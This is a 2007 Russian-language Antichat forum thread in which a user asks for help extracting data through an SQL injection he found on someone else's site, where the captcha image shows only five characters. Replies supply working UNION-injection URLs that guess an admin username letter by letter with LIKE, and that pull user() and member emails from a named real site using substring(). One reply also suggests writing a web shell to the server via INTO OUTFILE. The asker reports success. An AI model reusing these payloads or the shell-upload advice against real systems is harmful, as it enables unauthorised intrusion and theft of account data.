ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

нужна помощь по sql-injection
  #1  
Старый 27.03.2007, 01:06
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию нужна помощь по sql-injection

_drastvice_

у меня есть один очень интересный вопрос... есть сайт, нашел на нем sql-injection, а именно в скрипте вида:
Цитата:
http://site/captcha.php?id=-1'+union+select+1,2,3,4,5+from+mysql.user/*
FILE_PRIV есть, могу читать файлы через load_file и записывать через into outfile. Дело в том, что вся инфа выводится на избражение каптчи. Тоесть непосредственно на саму картинку. Длина выводимой инфы максимум - 5 символов.
Вопрос, можно ли как-то отобразить запрос по частям, тоесть , например, начиная с определенной строки, или как-нибудь выйти за пределы длинны в 5 символов?

з.ы. писать только по теме
 
Ответить с цитированием

  #2  
Старый 27.03.2007, 09:30
Аватар для spider-intruder
spider-intruder
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281

Репутация: 929


Отправить сообщение для spider-intruder с помощью ICQ
По умолчанию

>и записывать через into outfile

Залей шел например ачатовский :-)
И смотри что хочешь. Там же и доступ к БД получишь поискав в файлах сайта пароль логин к SQL
 
Ответить с цитированием

  #3  
Старый 27.03.2007, 10:10
Аватар для blaga
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185

Репутация: 694


Отправить сообщение для blaga с помощью ICQ
По умолчанию

Limit() не канает?
 
Ответить с цитированием

  #4  
Старый 27.03.2007, 10:53
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Был такой случай
Цитата:
Limit() не канает?
Ну во первых лимит не функция все таки что ты ее прям со скобками.
limit листает базу по колонкам а тут надо по буквам.

Ну если тебе надо выдрать допусить логин пасс админа из бд.

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin/*

тебе выводит admin

ты дальше юзаешь такую фишку как LIKE

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'admini%'/*
если вывелось admin то значет там еще есть буковка i

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'administrator%'/*

Если выводиться admin то в базе записанно administrator так же со всеми другими данными.
 
Ответить с цитированием

  #5  
Старый 27.03.2007, 10:59
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Цитата:
Сообщение от spider-intruder  
>и записывать через into outfile

Залей шел например ачатовский :-)
И смотри что хочешь. Там же и доступ к БД получишь поискав в файлах сайта пароль логин к SQL
вопрос вроде по другому звучал?
Цитата:
можно ли как-то отобразить запрос по частям, тоесть , например, начиная с определенной строки, или как-нибудь выйти за пределы длинны в 5 символов?

Цитата:
Сообщение от blaga  
Limit() не канает?
1. что есть "limit()", новая функция?
2. зачем лезть, если не понимаешь сути вопроса? молчание - золото..

p-range, 6 глава мануала по мускулу рулит
http://downloads.mysql.com/docs/refm...ml-chapter.zip
left(str,len)
right(str,len)
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,left(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,right(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
a вообще универсальная это substring(str,pos,len)
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,substring(user(),3,14),3,4,5,6, 7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
substring('antichat',2,6) выведет tich
__________________
ПИУ-ПИУ...

Последний раз редактировалось Koller; 28.03.2007 в 00:50..
 
Ответить с цитированием

  #6  
Старый 27.03.2007, 12:25
Аватар для blaga
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185

Репутация: 694


Отправить сообщение для blaga с помощью ICQ
По умолчанию

Цитата:
Ну во первых лимит не функция все таки что ты ее прям со скобками.
limit листает базу по колонкам а тут надо по буквам.
Цитата:
1. что есть "limit()", новая функция?
2. зачем лезть, если не понимаешь сути вопроса? молчание - золото..
согласен, не вкурил изначально в суть вопроса.
 
Ответить с цитированием

  #7  
Старый 27.03.2007, 22:51
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

сайт пока в дауне... =\ попробую позже, в любом случае всем спасибо за помощь
 
Ответить с цитированием

  #8  
Старый 28.03.2007, 10:51
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

сайт наконецто работает) спасибо всем за ответы. использовал substring(), все получилось
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ